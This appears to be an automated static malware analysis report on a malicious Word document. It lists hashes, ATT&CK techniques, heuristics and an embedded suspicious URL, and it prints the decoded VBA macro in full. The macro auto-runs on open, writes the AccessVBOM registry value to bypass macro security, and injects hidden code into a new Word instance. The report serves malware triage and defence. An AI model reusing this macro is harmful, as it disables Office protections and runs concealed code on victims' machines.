Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 6989ddda85d29056…

MALICIOUS

Office (OOXML) / .DOC

76.5 KB Created: 2021-04-30 07:59:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-04
MD5: 58d38a76fc8d7a8a386b6370bea4c185 SHA-1: a9b0c393fce5398af851d7b8d9e3c1d86d267f3e SHA-256: 6989ddda85d29056c2a86c4452ec8cb4867430278a656036de92fb8e595c830b
232 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1137.001 DLL Search Order Hijacking

This OOXML document contains VBA macros that leverage WScript.Shell and CreateObject to modify registry keys related to Office security settings. Specifically, it attempts to write to 'HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM', likely to bypass macro security and enable further execution. The presence of an AutoOpen macro and self-replication heuristics further indicate malicious intent.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    With CreateObject("wscript.shell")
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    .AddFromString deleteRightProcedure
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set textboxProcedureCollection = CreateObject("word.application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://westfoods2003a.com/dgsos/Tb3tNQKFNdJj78YYuXUM8vxiK9kEzIf/31809/FcwO1VVTAKEZVm1x9YSxQkyq6DVcxCjjdtzJ/94968/93863/xTf5s3THBpLM/Wzv23MrL9DZxRQvQgCOE/gq0hI936vgansKWPW4sFNdlBlDFRsj1bsG/dLIj2ZK4NkcKPg9zYLcfzirZtPtx1Pn64fLoW/DvNPx4lclwcqLaQAZSeiLYPCjjCble334A8/law8?user=D0rv198f7R&search=ShIfpVRYaTpLn2le&6rxKG0pu=1CME3RYtenUY&ref=DRzRqZb5NCWpJmycHieiF0I26Bdg&time=kJjD4n7tQmbdtF5&page=WJczkstBlW0PBT7IazEdDEY&nTt=sMEY7&page=4i&q=7zTehznnCVwHt8qpG In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1819 bytes
SHA-256: b7a581d7d236c76eb22596ed2525b97ff0c00e3996fe8bb691b8edba749d40f6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FE4B1A80-E5F3-4B26-8792-BD9636321962}{388B615C-E257-45E0-89D4-603562FD5788}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "responseResponse"
Sub autoopen()
bufVariableIndex
Dim viewClear As String
viewClear = screenTmpSwap
tableNamespaceIterator viewClear
End Sub

Attribute VB_Name = "trustSwapSwap"
Sub tableNamespaceIterator(deleteRightProcedure As String)
Set textboxProcedureCollection = CreateObject("word.application")
With textboxProcedureCollection.Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule
.AddFromString deleteRightProcedure
End With
textboxProcedureCollection.Visible = False
textboxProcedureCollection.Quit SaveChanges:=wdDoNotSaveChanges
End Sub

Attribute VB_Name = "WViewTitle"
Function borderConvertLocal() As String
borderConvertLocal = Application.Version
End Function
Sub referenceVbList(screenValueCount)
With CreateObject("wscript.shell")
.RegWrite screenValueCount, 1, "REG_DWORD"
End With
End Sub
Sub bufVariableIndex()
screenValueCount = "HKEY_CURRENT_USER\Software\Microsoft\Office\"
tableLoadTable = borderConvertLocal
globalMemory = "\Word\Security\AccessVBOM"
referenceVbList screenValueCount & tableLoadTable & globalMemory
End Sub
Function screenTmpSwap()
screenTmpSwap = UserForm1.TextBox1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 23040 bytes
SHA-256: fff8eaa7e11459d2ac245d8c3fc850ae760a375e71a676b1089692ac4a37a8e7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.